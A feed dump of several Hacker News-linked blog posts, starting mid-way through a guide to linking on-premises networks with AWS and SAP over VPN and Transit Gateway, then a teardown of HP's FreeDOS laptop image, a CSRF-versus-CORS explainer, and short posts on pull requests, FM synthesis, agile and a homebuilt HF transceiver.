[+] Seamlessly introduce new cloud services (e.g., RDS, Lambda, etc.) empowering your business outcomes.

Introducing new cloud services into your on-premises workspace becomes easier when you already have part of your business operating in the cloud. This setup allows you to reduce costs associated with legacy servers and take advantage of a pay-as-you-go model, which may be more cost-effective for your organization.

From my personal experience, I have observed clients implement Amazon S3 and significantly reduce costs for data that required a considerable retention period. While the specifics can vary from business to business, all organizations can benefit from moving some of their workloads into the cloud, ultimately leading to improved outcomes.


[+] Easily route or introduce other third-party services without disruption.

Similar to the point above, if you have more than one data center (e.g. country-based data centers), this topology model makes it easier to include any new components, enabling a much faster time-to-market.


[-] Adding a new component to the network architecture requires skilled personnel to maintain, update, and manage it effectively.

That is the main purpose of this tech post: building this topology effectively and updating it as changes come requires skilled personnel. This can be your starting point, or it can help you decide whether you want to go with this approach.

Feel free to email me: [g5o] at [lockedinspace] dot [com]
if you have more technical questions. Will answer as soon as possible.

Having said this, let's begin with the technical approach to make this work.

Putting things in place

Having a diagram helps in understanding where each piece goes; for this topology we will have three actors.

Agents in the topology
Each square in the diagram represents one component in the topology.
  • For on-premises, the range depicted (192.168.1.0/24) refers to the data center CIDR block.
  • AWS services are contained in a Virtual Private Cloud (VPC [3]), and the range 10.1.0.0/16 refers to our account VPC.
  • For SAP's side, we will provide the range through a form; the provided range must not collide with our VPC's range.

  • SAP has various methods of establishing the connection; for this tech post, we will stick with the Transit Gateway [4] method.
    Using AWS Site-to-Site VPN [5] will enable us to establish a connection between our data center and AWS.

    The resulting diagram would be:

    AWS Services in the topology

    Let's separate the diagram into two parts, so we can explain each section in more detail.

    On-Premises to AWS (and vice-versa)
    This part involves allowing your On-Premises data center to communicate with your AWS account. In the example depicted above, this is done through a Site-to-Site VPN [6] tunnel. Before establishing the connection, keep in mind the following prerequisites:
      Ensure that your On-Premises network and your AWS VPC CIDR blocks do not overlap.
      Ensure your router or firewall supports IPsec VPN; AWS uses that tunneling protocol for the Site-to-Site VPN service.
    Once the prerequisites are met, you will need to create a Transit Gateway (TGW) [7] in your AWS Account and attach it to your VPC.
    Next, define a Customer Gateway (CGW) [8] in AWS representing your on-premises endpoint.
    VPN Connection: Once the TGW and CGW are configured, establish a VPN connection between them. You can choose static or dynamic (BGP) routing.
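    To make the three steps concrete, here is a minimal boto3 sketch (assuming boto3 and configured credentials; the VPC, subnet, and IP values are placeholders from this post's examples, and waiters, tagging, and route configuration are omitted):

    import boto3

    ec2 = boto3.client("ec2")

    # 1. Create the Transit Gateway and attach it to your VPC
    tgw = ec2.create_transit_gateway(Description="hub for on-prem and SAP")
    tgw_id = tgw["TransitGateway"]["TransitGatewayId"]
    ec2.create_transit_gateway_vpc_attachment(
        TransitGatewayId=tgw_id,
        VpcId="vpc-049219323832386",             # your VPC
        SubnetIds=["subnet-0123456789abcdef0"],  # placeholder subnet
    )

    # 2. Define the Customer Gateway representing your on-premises endpoint
    cgw = ec2.create_customer_gateway(
        BgpAsn=65000,              # required field, unused with static routing
        PublicIp="195.125.24.13",  # on-premises public IP
        Type="ipsec.1",
    )

    # 3. Establish the VPN connection between the CGW and the TGW
    ec2.create_vpn_connection(
        CustomerGatewayId=cgw["CustomerGateway"]["CustomerGatewayId"],
        TransitGatewayId=tgw_id,
        Type="ipsec.1",
        Options={"StaticRoutesOnly": True},  # static routing, as in this post
    )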

    A high-level overview of what a connection between your On-Premises network and AWS looks like:
    AWS Services in the topology
    Keep in mind that in this example we are creating a VPN tunnel, which essentially travels the public internet through an encrypted connection. If your business case does not allow this, you can use AWS Direct Connect.
    Also note that we are using a TGW (Transit Gateway) instead of a VGW (Virtual Private Gateway) on the AWS side; going for this approach makes the infrastructure much more scalable, enabling you to easily connect multiple accounts' VPCs into the equation.

    Once everything is set up, you can test reachability with a simple test. Issue an ICMP request from one of your On-Premises servers and ping an EC2 instance in AWS.
    If the Security Group in AWS allows inbound connections from the 192.168.1.0/24 CIDR range (same for On-Premises firewall), servers from both ends will see each other.

    AWS to SAP RISE / ECS (and vice-versa)
    As of 2024, you will need to share some details with SAP through an Excel file. SAP will demand the following AWS information:
      Customer VPC ID: Your AWS account VPC ID (e.g. vpc-049219323832386)
      Customer Transit Gateway ID: Your TGW ID (e.g. tgw-0622323832386ca2)
      Customer AWS Account ID: The account ID where your VPC and TGW are hosted (e.g. 115823958138)
      Customer Network IP ranges: Your AWS VPC CIDR Range (e.g. 10.1.0.0/16)

    They will also demand some information for your VPN setup:
      Customer VPN Gateway Details: The software used on your On-Premises side (e.g. Sophos XG UTM (IPsec))
      Customer VPN Gateway Internet-facing public IP Address: Your public On-Premises IP address (e.g. 195.125.24.13/32)
      Type of Routing: Can be static or dynamic (e.g. static)
      BGP ASN for Dynamic Routing: Blank in this case because we are using static routing
      ASN for the AWS side of the BGP: The default ASN (e.g. 64512)
      Customer On-Premises Network IP ranges: Your On-Premises IP range (e.g. 192.168.1.0/24)

    Some important notes:
      You will need to provide SAP with a non-overlapping /22 or larger CIDR range reserved exclusively for them (e.g. 10.15.0.0/22); this /22 range will be used by SAP to build their SAP infrastructure services. Visit https://cidrclash.com to check whether two CIDR ranges collide, or run a quick local check as sketched below.
      Feel free to ask the SAP IT team if any concerns arise during the form setup; issues are quite common, but they will gladly support you if any mishap occurs.
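    As a quick local alternative to an online checker, Python's standard ipaddress module can test the three ranges used in this post for overlaps (a minimal sketch):

    import ipaddress

    ranges = {
        "on-premises": ipaddress.ip_network("192.168.1.0/24"),
        "aws-vpc":     ipaddress.ip_network("10.1.0.0/16"),
        "sap":         ipaddress.ip_network("10.15.0.0/22"),
    }

    # Compare each unordered pair of networks exactly once
    for a, net_a in ranges.items():
        for b, net_b in ranges.items():
            if a < b and net_a.overlaps(net_b):
                print(f"Collision: {a} {net_a} overlaps {b} {net_b}")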
    Next steps once provided details are valid
    You will need to share your TGW using Resource Access Manager (RAM) [9] with the provided SAP HEC AWS account.

    Once SAP accepts your share request, they will modify the TGW route table to propagate their infra CIDR (10.15.0.0/22) alongside yours (the On-Premises and AWS CIDRs, 192.168.1.0/24 and 10.1.0.0/16).
    After they verify everything, you will allow SAP's CIDR range (10.15.0.0/22) into your firewalls (the AWS Security Group and the Sophos router).
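    A boto3 sketch of these two steps (the share ARN, region, security group ID, and the SAP HEC account ID are placeholders; SAP provides the real account ID):

    import boto3

    # Share the TGW with the SAP HEC account via Resource Access Manager
    ram = boto3.client("ram")
    ram.create_resource_share(
        name="tgw-share-for-sap",
        resourceArns=["arn:aws:ec2:eu-central-1:115823958138"
                      ":transit-gateway/tgw-0622323832386ca2"],
        principals=["111122223333"],   # SAP HEC AWS account ID (placeholder)
        allowExternalPrincipals=True,
    )

    # Allow SAP's CIDR range into the AWS-side Security Group
    ec2 = boto3.client("ec2")
    ec2.authorize_security_group_ingress(
        GroupId="sg-0123456789abcdef0",  # placeholder security group
        IpPermissions=[{
            "IpProtocol": "-1",          # or restrict to the SAP ports you need
            "IpRanges": [{"CidrIp": "10.15.0.0/22",
                          "Description": "SAP RISE/ECS"}],
        }],
    )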

    With that, you should be able to query SAP nameservers from both your On-Premises and AWS servers.

    Conclusion

    Analyze whether your business can take advantage of the cloud; if that's the case, you can kill two birds with one stone: gaining governance of the network communications and getting a foothold in the cloud to progressively migrate your workloads there.

    This will enable your organization to leverage plenty of AWS services, such as Lambda, for its day-to-day operations and boost your On-Premises workforce.

    As always, if you feel stuck or need some guidance on how to tackle this scenario (or similar), feel free to e-mail me with your concerns.

    References

    date: 2024-10-05
    author: "[g5o] at [lockedinspace] dot [com] "
            
    ]]>
    https://lockedinspace.com/posts/003.html hacker-news-small-sites-43232058 Sun, 02 Mar 2025 16:28:54 GMT
    <![CDATA[The weird Hewlett Packard FreeDOS option]]> thread link) | @wibbily
    March 2, 2025 | https://blog.tmm.cx/2022/05/15/the-very-weird-hewlett-packard-freedos-option/ | archive.org

    The very weird Hewlett Packard FreeDOS option

    In this installment: some strange things I discovered when purchasing a FreeDOS laptop from Hewlett Packard. I suspect that the audience for this will be somewhat limited but I had fun exploring this. Perhaps you, dear reader, will find a chuckle in here too.

    Some background: I recently purchased an HP ZBook 17.8 G8. As I run Fedora Linux, I decided to have a little fun with the OS selection and picked the FreeDOS option (other options include Ubuntu and various flavors of Windows 11).

    And! Sure enough: After unpacking and plugging in the laptop I was greeted by the following.

    The out of the box FreeDOS experience of the HP Zbook Fury 17.8 G8

    Apart from this appearing to be a very old version of FreeDOS the primary thing I noticed was how long it took to get to this point. I was also fairly sure that I saw something flash during boot which looked suspiciously like some Linux kernel boot messages. I saved whatever was on the hard drive from the factory to some image files before installing Fedora Workstation.

    From the factory, HP included three partitions, and none of them appears terribly DOS-sy. It appears that HP is actually shipping Linux and then running DOS in a VM. Let's try to boot this whole thing in a VM and see what we get.

    As the eagle-eyed among you might have noticed, the "HP Documentation" link appears to start some kind of PDF reader. The document at the end starts with the following:

    Very limited indeed

    It seems that although this computer did indeed not ship with a Windows® operating system, it shipped with at minimum two others. I say at minimum because there are actually THREE operating systems shipped on this machine!

    What was in the factory image

    Now that we've seen what the factory image does, let's have a look at how it does it. First of all: What are we booting?

    # cat /etc/os-release 
    PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
    NAME="Debian GNU/Linux"
    VERSION_ID="9"
    VERSION="9 (stretch)"
    ID=debian
    HOME_URL="https://www.debian.org/"
    SUPPORT_URL="https://www.debian.org/support"
    BUG_REPORT_URL="https://bugs.debian.org/"

    So it appears we got a Debian GNU/Linux 9 installation on the hard drive. After some poking around I have found the following:

    • The laptop is set to UEFI boot, which boots a pretty standard GRUB
    • Debian gets booted with KMS disabled, as well as all DRM drivers.
    • Once the system is booted Gnome Display Manager starts
    • GDM will automatically login the root user and start the /root/.xsession
    • The XSession will start an XFCE terminal and execute Qemu on an image file in /home/aos/qemu

    The actual /root/.xsession is copied below:

    #!/bin/bash
    
    xfce4-terminal --zoom=-7 --geometry=1x1 --fullscreen --hide-toolbar --hide-menubar --hide-scrollbar --hide-borders -e "bash -c 'sleep 2 && xdotool search --name QEMU windowsize 100% 100% && xdotool search --name QEMU windowsize 100% 100%  && xdotool search --name QEMU windowsize 100% 100%  && xdotool search --name QEMU windowsize 100% 100% &  qemu-system-x86_64 -smp cores=8 --enable-kvm -m 2048 -vga cirrus -hda /home/aos/qemu/freedos.img -usbdevice tablet -usb -device usb-host,hostbus=2,hostaddr=1 -monitor telnet:127.0.0.1:9378,server,nowait && poweroff -f  ; exec bash'" >/dev/null 2>&1
    poweroff -f
    #xfce4-terminal --fullscreen --hide-toolbar --hide-menubar --hide-scrollbar --hide-borders

    This is an… interesting approach, probably necessary because no window manager is started in the X session. Xdotool is used in this case to repeatedly try to resize the Qemu window until it covers the entire X session. Apparently, after testing, just doing it three times was "good enough".

    What this basically does is the following:

    • Start an XFCE terminal hiding all of its UI
    • Start a 2 second timer and wait
    • At the same time start a Qemu virtual machine
    • Once the 2 second timer is up, search for the Qemu window and try to resize it to fill the screen. Do this three times in case one of them fails?
    • Once Qemu exits shutdown the computer

    More questions than answers

    At this point it is worth mentioning that the FreeDOS/HP Documentation menu is running inside the Qemu VM. The “real” bootloader (grub) does not have its menus enabled and just always boots straight into the Debian 9 installation on the hard drives.

    What is this "HP Documentation" thing, then? Did they package a DOS PDF reader? Well, only one way to find out. We have to go ONE LEVEL DEEPER (into /home/aos/qemu/freedos.img).

    # fdisk -l freedos.img 
    Disk freedos.img: 2 GiB, 2150400000 bytes, 4200000 sectors
    Units: sectors of 1 * 512 = 512 bytes
    Sector size (logical/physical): 512 bytes / 512 bytes
    I/O size (minimum/optimal): 512 bytes / 512 bytes
    Disklabel type: dos
    Disk identifier: 0x00000000
    
    Device       Boot   Start     End Sectors  Size Id Type
    freedos.img1         2048 2007039 2004992  979M  b W95 FAT32
    freedos.img2 *    2007040 4192255 2185216    1G  b W95 FAT32

    So it seems we have two partitions… Wait, is there a C: and a D: drive in here?

    Remember how I said there’s three operating systems on this machine? I lied: There’s four. The freedos.img file actually contains TWO separate FreeDOS installations however both are the exact same version.
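    If you want to poke at an image like this yourself, one approach (a sketch, not necessarily the method used in this investigation) is to compute byte offsets from the fdisk sector numbers above and loop-mount each partition read-only:

    # Generate mount commands from fdisk's 512-byte sector offsets (run as root)
    SECTOR = 512
    partitions = {"freedos_c": 2048, "freedos_d": 2007040}

    for name, start in partitions.items():
        offset = start * SECTOR
        print(f"mkdir -p /mnt/{name}")
        print(f"mount -o loop,ro,offset={offset} freedos.img /mnt/{name}")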

    Imageception: What is in freedos.img

    After extracting the contents of the two FAT32 partitions I found the following:

    • The image contains an installation of syslinux
    • Boot option one is a chain boot into FreeDOS on the first partition
    • Boot option two boots another Linux from the second partition
    label dos
            menu label ^FreeDOS
            menu default
            com32 chain.c32
            append hd0 1
    
    label live
            menu label ^HP Documents
            kernel /live/vmlinuz
            append initrd=/live/initrd.img boot=live config homepage=file:///hpdocs/platform_guides/languages/index.html nonetworking nopersistent quickreboot nomodeset radeon.modeset=0 nouveau.modeset=0 i915.modeset=0 username=webc video=vesa apm=off novtswitch pnpbios=off acpi=off nomce loglevel=3 libata.force=noncq quiet splash noroot novtswitch

    This Linux appears to live in /live and it has a squashfs root filesystem. So… let's have a poke at that too. This file is located on partition two in /live/filesystem.squashfs; no points for originality there.

    Most of the files in this filesystem seem to date back several decades so no convenient /etc/os-release file for us there. But we DO get an /etc/debian_version, there is no ubuntu_version so it appears that this is in fact Debian based.

    # cat debian_version 
    6.0.3

    It appears we have a 32bit Debian 6.0.3 installation. Judging by the release notes this release is from October 8th, 2011.

    Down, down, down we go

    It appears we have another image to dissect, this time the Debian 6.0.3 installation which shows us that helpful PDF telling us the PC is useless in its factory configuration. After looking through the various startup options, the image appears to be doing the following:

    • We boot Debian more-or-less like normal, disabling all hardware accelerated video outputs and switching to the VESA driver.
    • There’s an /etc/rc.local file which attempts to locate a partition labeled HPDOCS and mounts it on /hpdocs. If it can’t locate this it mounts whatever happens to be /dev/sda1 on /hpdocs
    • Start a service called “Webconverger”, this is apparently an old style “turn Debian into a web kiosk” project. (Archive.org link)

    Webconverger does a couple more things

    • Configures an X server
    • Sets iceweasel‘s homepage to the value from the pxelinux configuration above
    • Set audio volume control to 100% (ouch)
    • Sleep 10 seconds, then switch between virtual terminal 1 and 2

    Summary

    When ordering a HP machine with FreeDOS what you are getting is the following:

    • A Linux installation on the “bare metal” which boots a VM
    • This VM boots either an old version of FreeDOS or
    • An old version of Linux in a kiosk mode

    Conclusions, such as they are

    It doesn’t seem likely that the FreeDOS image as provided is actually good for anything. I didn’t really expect it to be but I was kind of hoping to install Duke Nukem 3D on “bare hardware” on a factory OS.

    Based on the dates and how this is put together, I assume that the contents of freedos.img are what used to be shipped on the real hardware. When NVMe drives and other modern hardware features became the norm, I suspect that this just didn't work any longer. Instead of updating the image, a VM layer was put in and the old factory image simply got included in the new one. It's not a terrible solution, really.

    Someone at HP really needs to learn what window managers are for on X11; they could have saved themselves a lot of headaches. If anyone wants to build a system like this, send me an email, I'm sure we can work something out 🙂

    To round out this review, below you will find some videos of the various boot options that shipped with the PC.

    Booting the original image into DOS
    Booting the original image into the Documentation page
    ]]>
    https://blog.tmm.cx/2022/05/15/the-very-weird-hewlett-packard-freedos-option/ hacker-news-small-sites-43232057 Sun, 02 Mar 2025 16:28:38 GMT
    <![CDATA[At 34 for v5.34: Modern Perl features for Perl's birthday]]> thread link) | @fanf2
    March 2, 2025 | https://phoenixtrap.com/2021/12/21/34-at-34-for-v5-34-modern-perl-features-for-perls-birthday/ | archive.org

    Unable to retrieve article]]>
    https://phoenixtrap.com/2021/12/21/34-at-34-for-v5-34-modern-perl-features-for-perls-birthday/ hacker-news-small-sites-43231529 Sun, 02 Mar 2025 15:42:03 GMT
    <![CDATA[Never Wait to Open a Pull Request]]> thread link) | @chilipepperhott
    March 2, 2025 | https://elijahpotter.dev/articles/never_wait | archive.org

    Preface: This post is specifically about Pull Requests for Harper. Read the contributor guidelines for a project before opening a PR.

    I get it. Opening a pull request is an intimidating proposition.

    It is non-trivial to put your blood, sweat, and (let's be honest) tears into code and put that onto the internet for the world to see. I remember my first pull request: it wasn't pretty either.

    But I want to highlight a couple of reasons why I want potential contributors to open their pull requests as early as possible.

    Drafts Reduce Duplicate Work

    When a contributor to a project is assessing the viability or usefulness of some work they're preparing to do, most look at existing Pull Requests first. Even if you're still working on the patch, it's a great idea to open a "draft" PR so no one starts work that could go to waste.

    Further, if you have a draft open whose CI is failing, a maintainer may see it and fix whatever the problem may be. I find myself frequently browsing Harper's Pull Requests looking for failing builds, since I'm often the best equipped to find the issue.

    It Helps With Debugging

    I try to make myself available to contributors in case they have any questions regarding the architecture of Harper. I'm also game to help debug their code, partly because I am of the opinion that debugging is a skill which is best learned by example.

    But it is hard for me to debug code if I don't have it. If a draft PR has been opened, I can usually see the problem without even cloning the code, since our CI is so comprehensive.

    Conclusion

    So please don't wait; open that PR. I am thrilled each time I see a name I don't recognize on a GitHub notification.

    ]]>
    https://elijahpotter.dev/articles/never_wait hacker-news-small-sites-43231487 Sun, 02 Mar 2025 15:38:51 GMT
    <![CDATA[Why do we have both CSRF protection and CORS?]]> thread link) | @smagin
    March 2, 2025 | https://smagin.fyi/posts/cross-site-requests/ | archive.org

    Hello, Internet. I thought about cross-site requests and realised we have both CSRF protection and CORS, which doesn't make sense at first glance. It does make sense eventually, but I need a thousand words to show why.

    CSRF stands for Cross-Site Request Forgery. It was rather popular on the earlier internet, but now it's almost a non-issue thanks to standard prevention mechanisms built into most popular web frameworks. The forgery is to make a user submit a form that will send a cross-site request. The protection is to check that the request didn't come from a third-party site.

    CORS stands for Cross-Origin Resource Sharing. It's a part of the HTTP specification that describes how to permit certain cross-site requests. This includes preflight requests and response headers that state which origins are allowed to send requests.

    So, by default, are cross-origin requests allowed, meaning we need CSRF protection, or are they forbidden, meaning we need CORS to allow them? The answer is both.

    The default behaviour

    The default behaviour is defined by the Same-origin policy and is enforced by browsers. The policy states that, generally speaking, cross-site writes are allowed and cross-site reads are not. You can send a POST request by submitting a form, but your browser won't let you read the response.

    There is a newer part of this spec that sort of solves CSRF. In 2019, there was an initiative to change the default cookie behaviour. Before that, cookies were always sent in cross-site requests. The default was changed to not send cookies in cross-site POST requests. To do that, a new SameSite attribute for the set-cookie header was introduced. The attribute value for the old default is None, and the new default would be Lax.
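    For illustration, here is a minimal Python stdlib sketch of a server making the attribute explicit (the cookie name and value are placeholders):

    from http.server import BaseHTTPRequestHandler, HTTPServer

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            # Lax: sent on top-level navigations, but not on cross-site POSTs;
            # SameSite=None would restore the old always-send behaviour
            self.send_header("Set-Cookie",
                             "session=opaque-token; SameSite=Lax; HttpOnly")
            self.end_headers()
            self.wfile.write(b"hello")

    HTTPServer(("127.0.0.1", 8000), Handler).serve_forever()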

    In 2025, 96% of browsers support the SameSite attribute, and 75% support the new default. Notably, Safari hasn't adopted the default, and UCBrowser doesn't support any nice things.

    Sidenote: I can’t understand how UCBrowser remains relatively popular among users, given that there are settings in js builders to build for N% of the users and next to nobody puts 99% there.

    Sidenote 2: Origin is not the same as Site. Origin is a combination of a scheme, a hostname, and a port. Site is a combination of scheme and effective top level domain + 1. Subdomains and ports don’t matter for sites.

    Links: Same-origin policy | caniuse SameSite cookie attribute

    CORS

    CORS is a way to override the same origin policy per origin.

    The spec describes a certain browser-server interaction. The browser sends a preflight request of type OPTIONS before the actual request; the server replies with rules for the origin. The rules are in the form of response headers. They may specify whether the reply can be read, which headers can be sent and received, and the allowed HTTP methods. Header names start with Access-Control. The browser then follows the rules.
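    A sketch of the server side of that exchange, using only Python's standard library (the allowed origin is a placeholder):

    from http.server import BaseHTTPRequestHandler, HTTPServer

    ALLOWED_ORIGIN = "https://app.example.com"

    class Handler(BaseHTTPRequestHandler):
        def do_OPTIONS(self):  # the preflight request
            self.send_response(204)
            self.send_header("Access-Control-Allow-Origin", ALLOWED_ORIGIN)
            self.send_header("Access-Control-Allow-Methods", "GET, POST, DELETE")
            self.send_header("Access-Control-Allow-Headers", "Content-Type")
            self.send_header("Access-Control-Max-Age", "86400")  # cache verdict
            self.end_headers()

        def do_DELETE(self):   # the actual request, sent only if permitted
            self.send_response(200)
            self.send_header("Access-Control-Allow-Origin", ALLOWED_ORIGIN)
            self.end_headers()

    HTTPServer(("127.0.0.1", 8000), Handler).serve_forever()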

    CORS applies to several types of requests:

    • js-initiated fetch and XMLHttpRequest
    • web fonts
    • webgl textures
    • images/video frames drawn to a canvas using drawImage
    • css shapes from images

    What is notoriously not in this list is form submissions, otherwise known as simple requests. This is part of the internet being backward-compatible:

    The motivation is that the <form> element from HTML 4.0 (which predates cross-site fetch() and XMLHttpRequest) can submit simple requests to any origin, so anyone writing a server must already be protecting against cross-site request forgery (CSRF). Under this assumption, the server doesn’t have to opt-in (by responding to a preflight request) to receive any request that looks like a form submission, since the threat of CSRF is no worse than that of form submission. However, the server still must opt-in using Access-Control-Allow-Origin to share the response with the script.

    From the CORS page on MDN.

    Question to readers: How is that in line with the SameSite initiative?

    CSRF protection

    So, cross-site write requests are allowed, but responses won’t be shared. At the same time, as website developers, we mostly don’t want to allow that.

    The standard protection is to include in a write request a user-specific token that is available only on read:

    • for forms this token is put into a hidden input,
    • for js-initiated requests the token can be stored in a cookie or in a meta tag, and is put into params or request headers.

    JS-initiated requests are not allowed cross-site by default anyway, but they are allowed same-site. Adding a CSRF token to js requests lets us do the check the same way for all requests.

    This way we still depend on the browser, in that it still has to prevent responses from being read cross-site by default, but a bit less than if we were also reading something like the Origin request header instead of checking for the token.
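    The shape of the check, framework details aside, is roughly this (a sketch; real frameworks add session management and, in some cases, token rotation):

    import hmac
    import secrets

    sessions: dict[str, str] = {}  # session id -> CSRF token

    def issue_token(session_id: str) -> str:
        token = secrets.token_urlsafe(32)
        sessions[session_id] = token
        return token  # embed in a hidden input or a meta tag

    def check_write_request(session_id: str, submitted: str) -> bool:
        expected = sessions.get(session_id, "")
        # constant-time comparison avoids leaking the token via timing
        return hmac.compare_digest(expected, submitted)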

    Question to readers: In some of the frameworks CSRF tokens are rotated. Why?

    Browser is important

    I want to emphasise how important browsers are in this whole security scheme. All the client state for all the sites is stored in the browser, and it decides which parts to expose and when. It's browsers that enforce the Same-origin policy, it's browsers that don't let responses be read if the server doesn't allow it. It's browsers that decide if they adopt the new SameSite=Lax default. It's browsers that implement CORS and send safe preflight requests before actual PATCH or DELETE.

    We really have to trust the browsers that we use.

    Conclusion

    What I learned

    The internet will become more secure, and maybe a bit less backward-compatible, once the SameSite=Lax default is adopted by 100% of browsers. Until then, we will have to live with the situation where simple POST requests are special and allowed cross-site, while others fall into the CORS bucket.

    Thanks Nikita Skazki for reviewing this post more times than I care to admit.

    This post on Hacker News

    Sources

    1. Same-origin policy
    2. caniuse SameSite cookie attribute
    3. OWASP CSRF cheatsheet
    4. CORS wiki with requirements
    5. CORS spec
    6. CORS on MDN
    7. Preflight request
    8. Origin request header
    9. Origin and Site
    ]]>
    https://smagin.fyi/posts/cross-site-requests/ hacker-news-small-sites-43231411 Sun, 02 Mar 2025 15:32:46 GMT
    <![CDATA[Show HN: Interactive Intro to FM Synthesis]]> thread link) | @crowselect
    March 2, 2025 | https://crowselectromusic.com/tools/fm-intro/ | archive.org

    Frequency Modulation (FM) synthesis is a way of creating a wide range of sounds by modulating (changing over time) the frequency of an oscillator using another oscillator.

    It starts with very simple elements: two oscillators. The first, called the "carrier" oscillator, is wired so it can be heard, and then the second, "modulator" oscillator is wired to the frequency control of the carrier. As the modulator oscillates, it speeds up and slows down the oscillations of the carrier. If the modulator oscillator is at a slow speed and intensity, this creates an effect usually called "vibrato" - but when the modulator is oscillating fast, in the audible range (20 Hz to 20,000 Hz), it's called FM synthesis.

    A diagram visualizing the carrier, modulator, and output of FM synthesis

    As the image above hints at, the resulting frequency modulated wave is much more complex than either the carrier oscillator, the modulator oscillator, or the two simply mixed together and heard.
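    The same idea can be written down in a few lines of numpy (a sketch of how FM is typically computed digitally, via phase modulation; the frequencies and modulation index here are arbitrary):

    import numpy as np

    sr = 48_000                 # sample rate, Hz
    t = np.arange(sr) / sr      # one second of time
    f_carrier, f_mod, index = 220.0, 110.0, 5.0

    modulator = np.sin(2 * np.pi * f_mod * t)
    fm = np.sin(2 * np.pi * f_carrier * t + index * modulator)
    # `fm` is far richer than either oscillator alone; write it to a
    # .wav file or plot its spectrum to see the sidebands appear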

    If your browser supports WebAudio, you can use the tool below to explore a simple FM setup - one carrier and one modulator. If you're not hearing sound, check that your phone isn't on silent.

    Carrier Oscillator Frequency:

    Modulator Oscillator Frequency:

    Modulation Amount:

    Using this basic idea we can create extremely complex FM synthesis setups that generate an almost infinite range of sounds. But if we want the sounds to evolve over time, we need to add envelopes to change the oscillators' levels or the amount of modulation.

    Below is another WebAudio example of a simple two-oscillator FM setup, just like the last example - but this time with a triggerable attack-release envelope controlling the level of the modulator oscillator:

    Carrier Oscillator Frequency:

    Modulator Oscillator Frequency:

    Modulator Envelope:


    Modulator Level Envelope Attack:

    Modulator Level Envelope Release:


    With carriers, modulators, and envelopes accounted for, all that's left is to scale up. That means using more oscillators, wired together in complex networks of modulators and carriers - usually called "algorithms". The Yamaha DX7, the instrument that popularized FM synthesis, had six oscillators that could all be used as modulators OR carriers, and they could be arranged into 32 different algorithms.

    A chart showing the 32 algorithms available on the original DX7

    I don't have the space or the WebAudio chops to build out a full six-operator FM synth here - but if you want to dive into the deep end of FM synthesis, Matt Montag has built an amazing in-browser DX7 emulation: http://mmontag.github.io/dx7-synth-js/.

    Thanks for exploring! This tool is made by Crows Electromusic. We hand-make electronic musical instruments in Vancouver, Canada. We will be releasing an instrument that uses FM soon - subscribe to our email list below if you'd like to be notified when it's available!

    ]]>
    https://crowselectromusic.com/tools/fm-intro/ hacker-news-small-sites-43231022 Sun, 02 Mar 2025 14:53:46 GMT
    <![CDATA[Is Agile All You Need?]]> thread link) | @arijo
    March 2, 2025 | https://www.feelingbuggy.com/p/is-agile-all-you-need | archive.org

    It’s common sense that in order to build large systems, a good strategy is to start with a simple base model and iterate until the whole system satisfies the desired criteria.

    This was one of the core ideas behind the Agile Manifesto.

    But there are other, more mature, human-built systems around: in law, math, physics, biology, etc.

    Yes, we must start from a simple idea and iterate, but at some point, we have to take a step back and figure out hidden patterns and principles.

    I’m not an expert, but look at memory safety mechanisms: garbage collection at runtime and the borrow checker at compile time. These concepts didn’t just happen by going “agile all the way” to the solution.

    At some point, families of problems are categorized and defined from first principles, always looking to solve both the original specific case and the more general problem patterns that we find.

    This isn’t the common path in most software agile projects.

    Iteration is a good thing, but taking a step back to think can solve problems that wouldn’t be solvable any other way.

    I would love to hear your thoughts on this topic.

    Thank you for reading this post.

    Discussion about this post

    ]]>
    https://www.feelingbuggy.com/p/is-agile-all-you-need hacker-news-small-sites-43230885 Sun, 02 Mar 2025 14:37:42 GMT
    <![CDATA[Tiny Ten DSP-Based HF Transceiver]]> thread link) | @wglb
    March 2, 2025 | https://www.janbob.com/electron/TinyTen/TinyTen.htm | archive.org

    A tour of the insides of a home-built, lightweight, ten-Watt, ten-band Amateur Radio Transmitter/Receiver.

    A Teensy 4.1 based transceiver that makes extensive use of the OpenAudio_ArduinoLibrary.

    Bob W7PUA


    Tiny Ten Radio

    Introduction - This all started while on a backpacking trip in Oregon's Cascade Mountains. We enjoyed the beautiful scenery of our alpine valley. The lake in front of the tent was crystal clear and reflected the surrounding mountains. But, radio signals were all shielded from us. Not only were there no cell signals, but we could only receive one weak FM broadcast station. The folks back home would really like to know that the bears had not gotten us, but it was not to be (they didn't). I had a 5-Watt 2-meter hand-held radio along, but that could not bring up any repeater, even using a half-wave antenna. Then, I remembered being out with Lew, N6QKP, on a similar trip, and he used his Elecraft KX-2 to easily make 75-meter contacts with a simple dipole antenna. This was on SSB and it seemed easy, even in places VHF signals don't get to. The logical conclusion was that I needed one of those.

    But logic doesn't always apply. Maybe the KX2 solution was too easy. Maybe it was the challenge of a new design. Certainly, one factor was my familiarity with the Teensy 4.1 and the associated floating point DSP library. But, in any event, I charged off to design and build a radio to meet some fairly specific goals: The original idea was 10 Watts on SSB and CW in a reasonably small package weighing less than 1-pound including a battery. It was to operate on the 80/75 and 40-meter amateur bands and use DSP to the extent possible to enhance both the receiver and transmitters. It was not intended as a home station and would use a small display to both keep things simple and to limit the current draw. The plan was for many hours of receiving time and perhaps 15 minutes of full power transmit time, running off the battery with no charging.

    Well, it has been a year and a half since the project started. There were several non-radio distractions, but the radio is now in operation on all modes. The basic goals have been achieved, and as is often the case, the complexity of the radio has grown. This write-up will summarise what the Tiny Ten looks like both physically and functionally. It is not a "how to" writeup, but neither are there any secrets. If you don't see something that interests you, ask, and I'll do my best. However, I have no plans to offer boards or kits.

    A couple of words on what this radio is and what it isn't. I wanted a real radio in the sense that the receiver sensitivity, dynamic range and selectivity would not limit the ability to communicate. The transmitter needed to be able to generate clean signals and provide enough power output to communicate on CW and FT8 any time and SSB most of the time. The use of CESSB produces clean signals with the effectiveness of a 25 Watt conventional SSB transmitter. The frequency accuracy and stability needed to be right on, with no question as to where we were in the band. In addition, the weight and size needed to be backpackable by an old guy. The choice of displays comes down to the second purpose for the rig, that being an opportunity to test out various ideas, such as small displays. The main reason for the small display was low power consumption. But, it is also an opportunity to experiment with ways to make the most of a minimalist control interface. I already knew what could be done with 50 knobs and switches along with a 10-inch display. It is time to see what can be done with 8 lines of 21 characters plus graphics!

